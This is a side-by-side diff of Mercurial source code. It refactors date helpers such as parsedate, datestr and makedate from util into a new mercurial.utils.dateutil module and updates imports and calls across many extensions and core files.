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@@ -59,8 +59,8 b' from mercurial import (' | |||||
59 | patch, |
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59 | patch, | |
60 | registrar, |
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60 | registrar, | |
61 | scmutil, |
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61 | scmutil, | |
62 | util, |
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63 | ) |
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62 | ) | |
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63 | from mercurial.utils import dateutil | |||
64 |
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64 | |||
65 | # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for |
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65 | # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for | |
66 | # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should |
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66 | # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should | |
@@ -382,7 +382,7 b' def synthesize(ui, repo, descpath, **opt' | |||||
382 | message = 'synthesized wide repo with %d files' % (len(files),) |
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382 | message = 'synthesized wide repo with %d files' % (len(files),) | |
383 | mc = context.memctx(repo, [pctx.node(), nullid], message, |
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383 | mc = context.memctx(repo, [pctx.node(), nullid], message, | |
384 | files, filectxfn, ui.username(), |
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384 | files, filectxfn, ui.username(), | |
385 | '%d %d' % util.makedate()) |
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385 | '%d %d' % dateutil.makedate()) | |
386 | initnode = mc.commit() |
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386 | initnode = mc.commit() | |
387 | if ui.debugflag: |
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387 | if ui.debugflag: | |
388 | hexfn = hex |
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388 | hexfn = hex |
@@ -49,6 +49,7 b' from mercurial import (' | |||||
49 | ui as uimod, |
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49 | ui as uimod, | |
50 | util, |
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50 | util, | |
51 | ) |
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51 | ) | |
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52 | from mercurial.utils import dateutil | |||
52 |
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53 | |||
53 | # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for |
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54 | # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for | |
54 | # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should |
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55 | # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should | |
@@ -164,7 +165,7 b' def wrapui(ui):' | |||||
164 | return |
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165 | return | |
165 | ui._bbinlog = True |
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166 | ui._bbinlog = True | |
166 | default = self.configdate('devel', 'default-date') |
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167 | default = self.configdate('devel', 'default-date') | |
167 | date = util.datestr(default, '%Y/%m/%d %H:%M:%S') |
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168 | date = dateutil.datestr(default, '%Y/%m/%d %H:%M:%S') | |
168 | user = util.getuser() |
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169 | user = util.getuser() | |
169 | pid = '%d' % util.getpid() |
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170 | pid = '%d' % util.getpid() | |
170 | formattedmsg = msg[0] % msg[1:] |
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171 | formattedmsg = msg[0] % msg[1:] |
@@ -23,8 +23,8 b' from mercurial import (' | |||||
23 | pycompat, |
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23 | pycompat, | |
24 | registrar, |
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24 | registrar, | |
25 | scmutil, |
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25 | scmutil, | |
26 | util, |
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27 | ) |
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26 | ) | |
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27 | from mercurial.utils import dateutil | |||
28 |
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28 | |||
29 | cmdtable = {} |
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29 | cmdtable = {} | |
30 | command = registrar.command(cmdtable) |
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30 | command = registrar.command(cmdtable) | |
@@ -65,7 +65,7 b' def countrate(ui, repo, amap, *pats, **o' | |||||
65 | rate = {} |
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65 | rate = {} | |
66 | df = False |
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66 | df = False | |
67 | if opts.get('date'): |
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67 | if opts.get('date'): | |
68 | df = util.matchdate(opts['date']) |
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68 | df = dateutil.matchdate(opts['date']) | |
69 |
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69 | |||
70 | m = scmutil.match(repo[None], pats, opts) |
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70 | m = scmutil.match(repo[None], pats, opts) | |
71 | def prep(ctx, fns): |
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71 | def prep(ctx, fns): |
@@ -541,7 +541,7 b' class mapfile(dict):' | |||||
541 | self.fp = None |
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541 | self.fp = None | |
542 |
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542 | |||
543 | def makedatetimestamp(t): |
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543 | def makedatetimestamp(t): | |
544 | """Like util.makedate() but for time t instead of current time""" |
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544 | """Like dateutil.makedate() but for time t instead of current time""" | |
545 | delta = (datetime.datetime.utcfromtimestamp(t) - |
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545 | delta = (datetime.datetime.utcfromtimestamp(t) - | |
546 | datetime.datetime.fromtimestamp(t)) |
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546 | datetime.datetime.fromtimestamp(t)) | |
547 | tz = delta.days * 86400 + delta.seconds |
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547 | tz = delta.days * 86400 + delta.seconds |
@@ -19,6 +19,7 b' from mercurial import (' | |||||
19 | scmutil, |
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19 | scmutil, | |
20 | util, |
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20 | util, | |
21 | ) |
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21 | ) | |
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22 | from mercurial.utils import dateutil | |||
22 |
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23 | |||
23 | from . import ( |
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24 | from . import ( | |
24 | bzr, |
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25 | bzr, | |
@@ -355,7 +356,7 b' class converter(object):' | |||||
355 | dates = {} |
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356 | dates = {} | |
356 | def getdate(n): |
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357 | def getdate(n): | |
357 | if n not in dates: |
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358 | if n not in dates: | |
358 | dates[n] = util.parsedate(self.commitcache[n].date) |
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359 | dates[n] = dateutil.parsedate(self.commitcache[n].date) | |
359 | return dates[n] |
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360 | return dates[n] | |
360 |
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361 | |||
361 | def picknext(nodes): |
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362 | def picknext(nodes): |
@@ -18,6 +18,7 b' from mercurial import (' | |||||
18 | pycompat, |
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18 | pycompat, | |
19 | util, |
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19 | util, | |
20 | ) |
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20 | ) | |
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21 | from mercurial.utils import dateutil | |||
21 |
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22 | |||
22 | from . import ( |
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23 | from . import ( | |
23 | common, |
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24 | common, | |
@@ -93,7 +94,7 b' class convert_cvs(converter_source):' | |||||
93 | cs.comment = self.recode(cs.comment) |
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94 | cs.comment = self.recode(cs.comment) | |
94 | if self.ui.configbool('convert', 'localtimezone'): |
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95 | if self.ui.configbool('convert', 'localtimezone'): | |
95 | cs.date = makedatetimestamp(cs.date[0]) |
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96 | cs.date = makedatetimestamp(cs.date[0]) | |
96 | date = util.datestr(cs.date, '%Y-%m-%d %H:%M:%S %1%2') |
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97 | date = dateutil.datestr(cs.date, '%Y-%m-%d %H:%M:%S %1%2') | |
97 | self.tags.update(dict.fromkeys(cs.tags, id)) |
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98 | self.tags.update(dict.fromkeys(cs.tags, id)) | |
98 |
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99 | |||
99 | files = {} |
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100 | files = {} |
@@ -17,6 +17,7 b' from mercurial import (' | |||||
17 | pycompat, |
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17 | pycompat, | |
18 | util, |
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18 | util, | |
19 | ) |
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19 | ) | |
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20 | from mercurial.utils import dateutil | |||
20 |
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21 | |||
21 | pickle = util.pickle |
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22 | pickle = util.pickle | |
22 |
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23 | |||
@@ -192,7 +193,7 b' def createlog(ui, directory=None, root="' | |||||
192 |
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193 | |||
193 | if oldlog: |
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194 | if oldlog: | |
194 | date = oldlog[-1].date # last commit date as a (time,tz) tuple |
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195 | date = oldlog[-1].date # last commit date as a (time,tz) tuple | |
195 | date = util.datestr(date, '%Y/%m/%d %H:%M:%S %1%2') |
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196 | date = dateutil.datestr(date, '%Y/%m/%d %H:%M:%S %1%2') | |
196 |
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197 | |||
197 | # build the CVS commandline |
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198 | # build the CVS commandline | |
198 | cmd = ['cvs', '-q'] |
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199 | cmd = ['cvs', '-q'] | |
@@ -336,7 +337,7 b' def createlog(ui, directory=None, root="' | |||||
336 | if len(d.split()) != 3: |
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337 | if len(d.split()) != 3: | |
337 | # cvs log dates always in GMT |
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338 | # cvs log dates always in GMT | |
338 | d = d + ' UTC' |
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339 | d = d + ' UTC' | |
339 | e.date = util.parsedate(d, ['%y/%m/%d %H:%M:%S', |
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340 | e.date = dateutil.parsedate(d, ['%y/%m/%d %H:%M:%S', | |
340 | '%Y/%m/%d %H:%M:%S', |
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341 | '%Y/%m/%d %H:%M:%S', | |
341 | '%Y-%m-%d %H:%M:%S']) |
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342 | '%Y-%m-%d %H:%M:%S']) | |
342 | e.author = scache(match.group(2)) |
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343 | e.author = scache(match.group(2)) | |
@@ -901,7 +902,7 b' def debugcvsps(ui, *args, **opts):' | |||||
901 | # bug-for-bug compatibility with cvsps. |
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902 | # bug-for-bug compatibility with cvsps. | |
902 | ui.write('---------------------\n') |
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903 | ui.write('---------------------\n') | |
903 | ui.write(('PatchSet %d \n' % cs.id)) |
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904 | ui.write(('PatchSet %d \n' % cs.id)) | |
904 | ui.write(('Date: %s\n' % util.datestr(cs.date, |
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905 | ui.write(('Date: %s\n' % dateutil.datestr(cs.date, | |
905 | '%Y/%m/%d %H:%M:%S %1%2'))) |
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906 | '%Y/%m/%d %H:%M:%S %1%2'))) | |
906 | ui.write(('Author: %s\n' % cs.author)) |
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907 | ui.write(('Author: %s\n' % cs.author)) | |
907 | ui.write(('Branch: %s\n' % (cs.branch or 'HEAD'))) |
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908 | ui.write(('Branch: %s\n' % (cs.branch or 'HEAD'))) |
@@ -16,6 +16,7 b' from mercurial import (' | |||||
16 | error, |
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16 | error, | |
17 | util, |
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17 | util, | |
18 | ) |
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18 | ) | |
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19 | from mercurial.utils import dateutil | |||
19 | from . import common |
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20 | from . import common | |
20 | NoRepo = common.NoRepo |
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21 | NoRepo = common.NoRepo | |
21 |
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22 | |||
@@ -148,12 +149,14 b' class darcs_source(common.converter_sour' | |||||
148 |
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149 | |||
149 | def getcommit(self, rev): |
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150 | def getcommit(self, rev): | |
150 | elt = self.changes[rev] |
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151 | elt = self.changes[rev] | |
151 |
date = |
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152 | dateformat = '%a %b %d %H:%M:%S %Z %Y' | |
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153 | date = dateutil.strdate(elt.get('local_date'), dateformat) | |||
152 | desc = elt.findtext('name') + '\n' + elt.findtext('comment', '') |
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154 | desc = elt.findtext('name') + '\n' + elt.findtext('comment', '') | |
153 | # etree can return unicode objects for name, comment, and author, |
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155 | # etree can return unicode objects for name, comment, and author, | |
154 | # so recode() is used to ensure str objects are emitted. |
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156 | # so recode() is used to ensure str objects are emitted. | |
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157 | newdateformat = '%Y-%m-%d %H:%M:%S %1%2' | |||
155 | return common.commit(author=self.recode(elt.get('author')), |
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158 | return common.commit(author=self.recode(elt.get('author')), | |
156 |
date=util.datestr(date, |
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159 | date=dateutil.datestr(date, newdateformat), | |
157 | desc=self.recode(desc).strip(), |
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160 | desc=self.recode(desc).strip(), | |
158 | parents=self.parents[rev]) |
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161 | parents=self.parents[rev]) | |
159 |
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162 |
@@ -19,6 +19,7 b' from mercurial import (' | |||||
19 | error, |
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19 | error, | |
20 | util, |
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20 | util, | |
21 | ) |
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21 | ) | |
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22 | from mercurial.utils import dateutil | |||
22 | from . import common |
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23 | from . import common | |
23 |
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24 | |||
24 | class gnuarch_source(common.converter_source, common.commandline): |
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25 | class gnuarch_source(common.converter_source, common.commandline): | |
@@ -280,8 +281,8 b' class gnuarch_source(common.converter_so' | |||||
280 | catlog = self.catlogparser.parsestr(data) |
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281 | catlog = self.catlogparser.parsestr(data) | |
281 |
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282 | |||
282 | # Commit date |
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283 | # Commit date | |
283 | self.changes[rev].date = util.datestr( |
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284 | self.changes[rev].date = dateutil.datestr( | |
284 | util.strdate(catlog['Standard-date'], |
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285 | dateutil.strdate(catlog['Standard-date'], | |
285 | '%Y-%m-%d %H:%M:%S')) |
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286 | '%Y-%m-%d %H:%M:%S')) | |
286 |
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287 | |||
287 | # Commit author |
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288 | # Commit author |
@@ -36,6 +36,7 b' from mercurial import (' | |||||
36 | scmutil, |
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36 | scmutil, | |
37 | util, |
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37 | util, | |
38 | ) |
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38 | ) | |
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39 | from mercurial.utils import dateutil | |||
39 | stringio = util.stringio |
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40 | stringio = util.stringio | |
40 |
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41 | |||
41 | from . import common |
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42 | from . import common | |
@@ -583,7 +584,7 b' class mercurial_source(common.converter_' | |||||
583 | crev = rev |
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584 | crev = rev | |
584 |
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585 | |||
585 | return common.commit(author=ctx.user(), |
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586 | return common.commit(author=ctx.user(), | |
586 | date=util.datestr(ctx.date(), |
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587 | date=dateutil.datestr(ctx.date(), | |
587 | '%Y-%m-%d %H:%M:%S %1%2'), |
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588 | '%Y-%m-%d %H:%M:%S %1%2'), | |
588 | desc=ctx.description(), |
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589 | desc=ctx.description(), | |
589 | rev=crev, |
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590 | rev=crev, |
@@ -14,8 +14,8 b' from mercurial.i18n import _' | |||||
14 | from mercurial import ( |
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14 | from mercurial import ( | |
15 | error, |
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15 | error, | |
16 | pycompat, |
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16 | pycompat, | |
17 | util, |
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18 | ) |
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17 | ) | |
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18 | from mercurial.utils import dateutil | |||
19 |
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19 | |||
20 | from . import common |
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20 | from . import common | |
21 |
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21 | |||
@@ -310,9 +310,10 b' class monotone_source(common.converter_s' | |||||
310 | certs = self.mtngetcerts(rev) |
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310 | certs = self.mtngetcerts(rev) | |
311 | if certs.get('suspend') == certs["branch"]: |
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311 | if certs.get('suspend') == certs["branch"]: | |
312 | extra['close'] = 1 |
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312 | extra['close'] = 1 | |
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313 | dateformat = "%Y-%m-%dT%H:%M:%S" | |||
313 | return common.commit( |
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314 | return common.commit( | |
314 | author=certs["author"], |
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315 | author=certs["author"], | |
315 |
date=util.datestr(util.strdate(certs["date"], |
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316 | date=dateutil.datestr(dateutil.strdate(certs["date"], dateformat)), | |
316 | desc=certs["changelog"], |
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317 | desc=certs["changelog"], | |
317 | rev=rev, |
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318 | rev=rev, | |
318 | parents=self.mtnrun("parents", rev).splitlines(), |
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319 | parents=self.mtnrun("parents", rev).splitlines(), |
@@ -14,6 +14,7 b' from mercurial import (' | |||||
14 | error, |
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14 | error, | |
15 | util, |
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15 | util, | |
16 | ) |
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16 | ) | |
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17 | from mercurial.utils import dateutil | |||
17 |
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18 | |||
18 | from . import common |
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19 | from . import common | |
19 |
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20 | |||
@@ -346,7 +347,7 b' class p4_source(common.converter_source)' | |||||
346 | parents = [] |
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347 | parents = [] | |
347 |
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348 | |||
348 | return common.commit(author=self.recode(obj["user"]), |
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349 | return common.commit(author=self.recode(obj["user"]), | |
349 | date=util.datestr(date, '%Y-%m-%d %H:%M:%S %1%2'), |
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350 | date=dateutil.datestr(date, '%Y-%m-%d %H:%M:%S %1%2'), | |
350 | parents=parents, desc=desc, branch=None, rev=obj['change'], |
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351 | parents=parents, desc=desc, branch=None, rev=obj['change'], | |
351 | extra={"p4": obj['change'], "convert_revision": obj['change']}) |
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352 | extra={"p4": obj['change'], "convert_revision": obj['change']}) | |
352 |
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353 |
@@ -16,6 +16,7 b' from mercurial import (' | |||||
16 | util, |
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16 | util, | |
17 | vfs as vfsmod, |
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17 | vfs as vfsmod, | |
18 | ) |
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18 | ) | |
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19 | from mercurial.utils import dateutil | |||
19 |
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20 | |||
20 | from . import common |
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21 | from . import common | |
21 |
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22 | |||
@@ -891,7 +892,7 b' class svn_source(converter_source):' | |||||
891 | # Example SVN datetime. Includes microseconds. |
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892 | # Example SVN datetime. Includes microseconds. | |
892 | # ISO-8601 conformant |
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893 | # ISO-8601 conformant | |
893 | # '2007-01-04T17:35:00.902377Z' |
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894 | # '2007-01-04T17:35:00.902377Z' | |
894 | date = util.parsedate(date[:19] + " UTC", ["%Y-%m-%dT%H:%M:%S"]) |
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895 | date = dateutil.parsedate(date[:19] + " UTC", ["%Y-%m-%dT%H:%M:%S"]) | |
895 | if self.ui.configbool('convert', 'localtimezone'): |
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896 | if self.ui.configbool('convert', 'localtimezone'): | |
896 | date = makedatetimestamp(date[0]) |
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897 | date = makedatetimestamp(date[0]) | |
897 |
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898 | |||
@@ -913,7 +914,7 b' class svn_source(converter_source):' | |||||
913 | branch = None |
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914 | branch = None | |
914 |
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915 | |||
915 | cset = commit(author=author, |
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916 | cset = commit(author=author, | |
916 | date=util.datestr(date, '%Y-%m-%d %H:%M:%S %1%2'), |
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917 | date=dateutil.datestr(date, '%Y-%m-%d %H:%M:%S %1%2'), | |
917 | desc=log, |
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918 | desc=log, | |
918 | parents=parents, |
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919 | parents=parents, | |
919 | branch=branch, |
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920 | branch=branch, |
@@ -23,6 +23,7 b' from mercurial import (' | |||||
23 | registrar, |
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23 | registrar, | |
24 | util, |
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24 | util, | |
25 | ) |
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25 | ) | |
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26 | from mercurial.utils import dateutil | |||
26 |
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27 | |||
27 | release = lock.release |
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28 | release = lock.release | |
28 | cmdtable = {} |
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29 | cmdtable = {} | |
@@ -64,7 +65,7 b" def fetch(ui, repo, source='default', **" | |||||
64 | opts = pycompat.byteskwargs(opts) |
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65 | opts = pycompat.byteskwargs(opts) | |
65 | date = opts.get('date') |
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66 | date = opts.get('date') | |
66 | if date: |
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67 | if date: | |
67 | opts['date'] = util.parsedate(date) |
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68 | opts['date'] = dateutil.parsedate(date) | |
68 |
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69 | |||
69 | parent, _p2 = repo.dirstate.parents() |
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70 | parent, _p2 = repo.dirstate.parents() | |
70 | branch = repo.dirstate.branch() |
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71 | branch = repo.dirstate.branch() |
@@ -21,6 +21,7 b' from mercurial import (' | |||||
21 | registrar, |
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21 | registrar, | |
22 | util, |
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22 | util, | |
23 | ) |
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23 | ) | |
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24 | from mercurial.utils import dateutil | |||
24 |
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25 | |||
25 | cmdtable = {} |
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26 | cmdtable = {} | |
26 | command = registrar.command(cmdtable) |
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27 | command = registrar.command(cmdtable) | |
@@ -258,7 +259,7 b' def _dosign(ui, repo, *revs, **opts):' | |||||
258 |
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259 | |||
259 | date = opts.get('date') |
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260 | date = opts.get('date') | |
260 | if date: |
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261 | if date: | |
261 | opts['date'] = util.parsedate(date) |
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262 | opts['date'] = dateutil.parsedate(date) | |
262 |
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263 | |||
263 | if revs: |
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264 | if revs: | |
264 | nodes = [repo.lookup(n) for n in revs] |
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265 | nodes = [repo.lookup(n) for n in revs] |
@@ -35,6 +35,7 b' from mercurial import (' | |||||
35 | registrar, |
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35 | registrar, | |
36 | util, |
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36 | util, | |
37 | ) |
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37 | ) | |
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38 | from mercurial.utils import dateutil | |||
38 |
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39 | |||
39 | cmdtable = {} |
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40 | cmdtable = {} | |
40 | command = registrar.command(cmdtable) |
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41 | command = registrar.command(cmdtable) | |
@@ -326,7 +327,7 b' class journalstorage(object):' | |||||
326 | newhashes = [newhashes] |
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327 | newhashes = [newhashes] | |
327 |
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328 | |||
328 | entry = journalentry( |
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329 | entry = journalentry( | |
329 | util.makedate(), self.user, self.command, namespace, name, |
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330 | dateutil.makedate(), self.user, self.command, namespace, name, | |
330 | oldhashes, newhashes) |
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331 | oldhashes, newhashes) | |
331 |
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332 | |||
332 | vfs = self.vfs |
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333 | vfs = self.vfs |
@@ -111,6 +111,7 b' from mercurial import (' | |||||
111 | templatefilters, |
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111 | templatefilters, | |
112 | util, |
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112 | util, | |
113 | ) |
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113 | ) | |
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114 | from mercurial.utils import dateutil | |||
114 |
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115 | |||
115 | cmdtable = {} |
|
116 | cmdtable = {} | |
116 | command = registrar.command(cmdtable) |
|
117 | command = registrar.command(cmdtable) | |
@@ -156,21 +157,23 b" configitem('keywordset', 'svn'," | |||||
156 | def utcdate(text): |
|
157 | def utcdate(text): | |
157 | '''Date. Returns a UTC-date in this format: "2009/08/18 11:00:13". |
|
158 | '''Date. Returns a UTC-date in this format: "2009/08/18 11:00:13". | |
158 | ''' |
|
159 | ''' | |
159 | return util.datestr((util.parsedate(text)[0], 0), '%Y/%m/%d %H:%M:%S') |
|
160 | dateformat = '%Y/%m/%d %H:%M:%S' | |
|
161 | return dateutil.datestr((dateutil.parsedate(text)[0], 0), dateformat) | |||
160 | # date like in svn's $Date |
|
162 | # date like in svn's $Date | |
161 | @templatefilter('svnisodate') |
|
163 | @templatefilter('svnisodate') | |
162 | def svnisodate(text): |
|
164 | def svnisodate(text): | |
163 | '''Date. Returns a date in this format: "2009-08-18 13:00:13 |
|
165 | '''Date. Returns a date in this format: "2009-08-18 13:00:13 | |
164 | +0200 (Tue, 18 Aug 2009)". |
|
166 | +0200 (Tue, 18 Aug 2009)". | |
165 | ''' |
|
167 | ''' | |
166 | return util.datestr(text, '%Y-%m-%d %H:%M:%S %1%2 (%a, %d %b %Y)') |
|
168 | return dateutil.datestr(text, '%Y-%m-%d %H:%M:%S %1%2 (%a, %d %b %Y)') | |
167 | # date like in svn's $Id |
|
169 | # date like in svn's $Id | |
168 | @templatefilter('svnutcdate') |
|
170 | @templatefilter('svnutcdate') | |
169 | def svnutcdate(text): |
|
171 | def svnutcdate(text): | |
170 | '''Date. Returns a UTC-date in this format: "2009-08-18 |
|
172 | '''Date. Returns a UTC-date in this format: "2009-08-18 | |
171 | 11:00:13Z". |
|
173 | 11:00:13Z". | |
172 | ''' |
|
174 | ''' | |
173 | return util.datestr((util.parsedate(text)[0], 0), '%Y-%m-%d %H:%M:%SZ') |
|
175 | dateformat = '%Y-%m-%d %H:%M:%SZ' | |
|
176 | return dateutil.datestr((dateutil.parsedate(text)[0], 0), dateformat) | |||
174 |
|
177 | |||
175 | # make keyword tools accessible |
|
178 | # make keyword tools accessible | |
176 | kwtools = {'hgcmd': ''} |
|
179 | kwtools = {'hgcmd': ''} |
@@ -98,6 +98,7 b' from mercurial import (' | |||||
98 | util, |
|
98 | util, | |
99 | vfs as vfsmod, |
|
99 | vfs as vfsmod, | |
100 | ) |
|
100 | ) | |
|
101 | from mercurial.utils import dateutil | |||
101 |
|
102 | |||
102 | release = lockmod.release |
|
103 | release = lockmod.release | |
103 | seriesopts = [('s', 'summary', None, _('print first line of patch header'))] |
|
104 | seriesopts = [('s', 'summary', None, _('print first line of patch header'))] | |
@@ -1201,7 +1202,7 b' class queue(object):' | |||||
1201 | user = opts.get('user') |
|
1202 | user = opts.get('user') | |
1202 | date = opts.get('date') |
|
1203 | date = opts.get('date') | |
1203 | if date: |
|
1204 | if date: | |
1204 | date = util.parsedate(date) |
|
1205 | date = dateutil.parsedate(date) | |
1205 | diffopts = self.diffopts({'git': opts.get('git')}, plain=True) |
|
1206 | diffopts = self.diffopts({'git': opts.get('git')}, plain=True) | |
1206 | if opts.get('checkname', True): |
|
1207 | if opts.get('checkname', True): | |
1207 | self.checkpatchname(patchfn) |
|
1208 | self.checkpatchname(patchfn) | |
@@ -1644,7 +1645,7 b' class queue(object):' | |||||
1644 | newuser = opts.get('user') |
|
1645 | newuser = opts.get('user') | |
1645 | newdate = opts.get('date') |
|
1646 | newdate = opts.get('date') | |
1646 | if newdate: |
|
1647 | if newdate: | |
1647 | newdate = '%d %d' % util.parsedate(newdate) |
|
1648 | newdate = '%d %d' % dateutil.parsedate(newdate) | |
1648 | wlock = repo.wlock() |
|
1649 | wlock = repo.wlock() | |
1649 |
|
1650 | |||
1650 | try: |
|
1651 | try: | |
@@ -2596,7 +2597,7 b' def setupheaderopts(ui, opts):' | |||||
2596 | if not opts.get('user') and opts.get('currentuser'): |
|
2597 | if not opts.get('user') and opts.get('currentuser'): | |
2597 | opts['user'] = ui.username() |
|
2598 | opts['user'] = ui.username() | |
2598 | if not opts.get('date') and opts.get('currentdate'): |
|
2599 | if not opts.get('date') and opts.get('currentdate'): | |
2599 | opts['date'] = "%d %d" % util.makedate() |
|
2600 | opts['date'] = "%d %d" % dateutil.makedate() | |
2600 |
|
2601 | |||
2601 | @command("^qnew", |
|
2602 | @command("^qnew", | |
2602 | [('e', 'edit', None, _('invoke editor on commit messages')), |
|
2603 | [('e', 'edit', None, _('invoke editor on commit messages')), |
@@ -149,6 +149,7 b' from mercurial import (' | |||||
149 | registrar, |
|
149 | registrar, | |
150 | util, |
|
150 | util, | |
151 | ) |
|
151 | ) | |
|
152 | from mercurial.utils import dateutil | |||
152 |
|
153 | |||
153 | # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for |
|
154 | # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for | |
154 | # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should |
|
155 | # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should | |
@@ -360,7 +361,7 b' class notifier(object):' | |||||
360 | for k, v in headers: |
|
361 | for k, v in headers: | |
361 | msg[k] = v |
|
362 | msg[k] = v | |
362 |
|
363 | |||
363 | msg['Date'] = util.datestr(format="%a, %d %b %Y %H:%M:%S %1%2") |
|
364 | msg['Date'] = dateutil.datestr(format="%a, %d %b %Y %H:%M:%S %1%2") | |
364 |
|
365 | |||
365 | # try to make subject line exist and be useful |
|
366 | # try to make subject line exist and be useful | |
366 | if not subject: |
|
367 | if not subject: |
@@ -99,6 +99,7 b' from mercurial import (' | |||||
99 | templater, |
|
99 | templater, | |
100 | util, |
|
100 | util, | |
101 | ) |
|
101 | ) | |
|
102 | from mercurial.utils import dateutil | |||
102 | stringio = util.stringio |
|
103 | stringio = util.stringio | |
103 |
|
104 | |||
104 | cmdtable = {} |
|
105 | cmdtable = {} | |
@@ -665,9 +666,9 b' def email(ui, repo, *revs, **opts):' | |||||
665 |
|
666 | |||
666 | # start |
|
667 | # start | |
667 | if date: |
|
668 | if date: | |
668 | start_time = util.parsedate(date) |
|
669 | start_time = dateutil.parsedate(date) | |
669 | else: |
|
670 | else: | |
670 | start_time = util.makedate() |
|
671 | start_time = dateutil.makedate() | |
671 |
|
672 | |||
672 | def genmsgid(id): |
|
673 | def genmsgid(id): | |
673 | return '<%s.%d@%s>' % (id[:20], int(start_time[0]), |
|
674 | return '<%s.%d@%s>' % (id[:20], int(start_time[0]), |
@@ -55,6 +55,7 b' from mercurial import (' | |||||
55 | from . import ( |
|
55 | from . import ( | |
56 | rebase, |
|
56 | rebase, | |
57 | ) |
|
57 | ) | |
|
58 | from mercurial.utils import dateutil | |||
58 |
|
59 | |||
59 | cmdtable = {} |
|
60 | cmdtable = {} | |
60 | command = registrar.command(cmdtable) |
|
61 | command = registrar.command(cmdtable) | |
@@ -563,7 +564,8 b' def listcmd(ui, repo, pats, opts):' | |||||
563 | continue |
|
564 | continue | |
564 | ui.write(' ' * (16 - len(sname))) |
|
565 | ui.write(' ' * (16 - len(sname))) | |
565 | used = 16 |
|
566 | used = 16 | |
566 |
|
|
567 | date = dateutil.makedate(mtime) | |
|
568 | age = '(%s)' % templatefilters.age(date, abbrev=True) | |||
567 | ui.write(age, label='shelve.age') |
|
569 | ui.write(age, label='shelve.age') | |
568 | ui.write(' ' * (12 - len(age))) |
|
570 | ui.write(' ' * (12 - len(age))) | |
569 | used += 12 |
|
571 | used += 12 |
@@ -24,6 +24,7 b' from . import (' | |||||
24 | revlog, |
|
24 | revlog, | |
25 | util, |
|
25 | util, | |
26 | ) |
|
26 | ) | |
|
27 | from .utils import dateutil | |||
27 |
|
28 | |||
28 | _defaultextra = {'branch': 'default'} |
|
29 | _defaultextra = {'branch': 'default'} | |
29 |
|
30 | |||
@@ -524,9 +525,9 b' class changelog(revlog.revlog):' | |||||
524 | desc = stripdesc(desc) |
|
525 | desc = stripdesc(desc) | |
525 |
|
526 | |||
526 | if date: |
|
527 | if date: | |
527 | parseddate = "%d %d" % util.parsedate(date) |
|
528 | parseddate = "%d %d" % dateutil.parsedate(date) | |
528 | else: |
|
529 | else: | |
529 | parseddate = "%d %d" % util.makedate() |
|
530 | parseddate = "%d %d" % dateutil.makedate() | |
530 | if extra: |
|
531 | if extra: | |
531 | branch = extra.get("branch") |
|
532 | branch = extra.get("branch") | |
532 | if branch in ("default", ""): |
|
533 | if branch in ("default", ""): |
@@ -47,6 +47,7 b' from . import (' | |||||
47 | util, |
|
47 | util, | |
48 | vfs as vfsmod, |
|
48 | vfs as vfsmod, | |
49 | ) |
|
49 | ) | |
|
50 | from .utils import dateutil | |||
50 | stringio = util.stringio |
|
51 | stringio = util.stringio | |
51 |
|
52 | |||
52 | # templates of common command options |
|
53 | # templates of common command options | |
@@ -1530,7 +1531,7 b' def _exportsingle(repo, ctx, match, swit' | |||||
1530 | write("# HG changeset patch\n") |
|
1531 | write("# HG changeset patch\n") | |
1531 | write("# User %s\n" % ctx.user()) |
|
1532 | write("# User %s\n" % ctx.user()) | |
1532 | write("# Date %d %d\n" % ctx.date()) |
|
1533 | write("# Date %d %d\n" % ctx.date()) | |
1533 | write("# %s\n" % util.datestr(ctx.date())) |
|
1534 | write("# %s\n" % dateutil.datestr(ctx.date())) | |
1534 | if branch and branch != 'default': |
|
1535 | if branch and branch != 'default': | |
1535 | write("# Branch %s\n" % branch) |
|
1536 | write("# Branch %s\n" % branch) | |
1536 | write("# Node ID %s\n" % hex(node)) |
|
1537 | write("# Node ID %s\n" % hex(node)) | |
@@ -1629,7 +1630,7 b' def showmarker(fm, marker, index=None):' | |||||
1629 | def finddate(ui, repo, date): |
|
1630 | def finddate(ui, repo, date): | |
1630 | """Find the tipmost changeset that matches the given date spec""" |
|
1631 | """Find the tipmost changeset that matches the given date spec""" | |
1631 |
|
1632 | |||
1632 | df = util.matchdate(date) |
|
1633 | df = dateutil.matchdate(date) | |
1633 | m = scmutil.matchall(repo) |
|
1634 | m = scmutil.matchall(repo) | |
1634 | results = {} |
|
1635 | results = {} | |
1635 |
|
1636 | |||
@@ -1642,7 +1643,7 b' def finddate(ui, repo, date):' | |||||
1642 | rev = ctx.rev() |
|
1643 | rev = ctx.rev() | |
1643 | if rev in results: |
|
1644 | if rev in results: | |
1644 | ui.status(_("found revision %s from %s\n") % |
|
1645 | ui.status(_("found revision %s from %s\n") % | |
1645 | (rev, util.datestr(results[rev]))) |
|
1646 | (rev, dateutil.datestr(results[rev]))) | |
1646 | return '%d' % rev |
|
1647 | return '%d' % rev | |
1647 |
|
1648 | |||
1648 | raise error.Abort(_("revision matching date not found")) |
|
1649 | raise error.Abort(_("revision matching date not found")) | |
@@ -2261,7 +2262,7 b' def commit(ui, repo, commitfunc, pats, o' | |||||
2261 | '''commit the specified files or all outstanding changes''' |
|
2262 | '''commit the specified files or all outstanding changes''' | |
2262 | date = opts.get('date') |
|
2263 | date = opts.get('date') | |
2263 | if date: |
|
2264 | if date: | |
2264 | opts['date'] = util.parsedate(date) |
|
2265 | opts['date'] = dateutil.parsedate(date) | |
2265 | message = logmessage(ui, opts) |
|
2266 | message = logmessage(ui, opts) | |
2266 | matcher = scmutil.match(repo[None], pats, opts) |
|
2267 | matcher = scmutil.match(repo[None], pats, opts) | |
2267 |
|
2268 | |||
@@ -2326,7 +2327,7 b' def amend(ui, repo, old, extra, pats, op' | |||||
2326 | date = opts.get('date') or old.date() |
|
2327 | date = opts.get('date') or old.date() | |
2327 |
|
2328 | |||
2328 | # Parse the date to allow comparison between date and old.date() |
|
2329 | # Parse the date to allow comparison between date and old.date() | |
2329 | date = util.parsedate(date) |
|
2330 | date = dateutil.parsedate(date) | |
